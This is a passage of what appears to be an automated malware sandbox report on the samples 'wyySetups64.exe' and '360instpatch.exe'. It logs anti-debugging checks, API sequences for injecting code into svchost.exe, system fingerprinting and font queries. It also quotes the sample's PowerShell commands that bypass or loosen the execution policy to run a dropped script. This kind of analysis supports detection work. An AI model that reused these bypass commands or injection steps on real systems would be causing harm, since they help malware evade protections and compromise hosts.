    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B94647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00B94647
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B9116F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00B9116F
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B918F6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00B918F6
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF38207 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6BF38207
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF384D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6BF384D6
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF47A51 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6BF47A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDDE1EA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6CDDE1EA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B94647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00B94647
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B9116F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00B9116F
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B918F6 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00B918F6

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Bypasses PowerShell execution policy
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Contains functionality to inject code into remote processes
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,1_2_033777E0
    Contains functionality to inject threads in other processes
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,1_2_033777E0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe1_2_033777E0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe1_2_033777E0
    Source: C:\Users\user\Desktop\wyySetups64.exeProcess created: C:\Users\user\AppData\Roaming\wyySetups64.exe "C:\Users\user\AppData\Roaming\wyySetups64.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
    Source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.drBinary or memory string: gShell_traywnd*.*
    Source: wyySetups64.exe, 00000001.00000003.1901055660.0000000004412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min066656Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
    Source: wyySetups64.exe, 00000001.00000003.4113626803.0000000004475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min066656Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
    Source: 360instpatch.exeBinary or memory string: Shell_traywnd
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B165C0 cpuid 8_2_00B165C0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,1_2_03375430
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00BA7AB2
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,8_2_00BBC813
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,8_2_00BA7569
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,8_2_00BA7AEE
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00BA7A4B
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,8_2_6BF4C53B
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,8_2_6CDF6445
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,8_2_6CDF60BA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_6CDF607E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_6CDF6017
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,8_2_6CDF7C17
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{4E37D1B0-FC9E-4af1-8227-2DAA098CDF46}.tmp VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{D699128A-3414-4fdc-A2BD-B3D2CDE19B93}.tmp VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{9AE51E5B-D986-4b47-9A8E-7D0F888610BF}.tmp VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
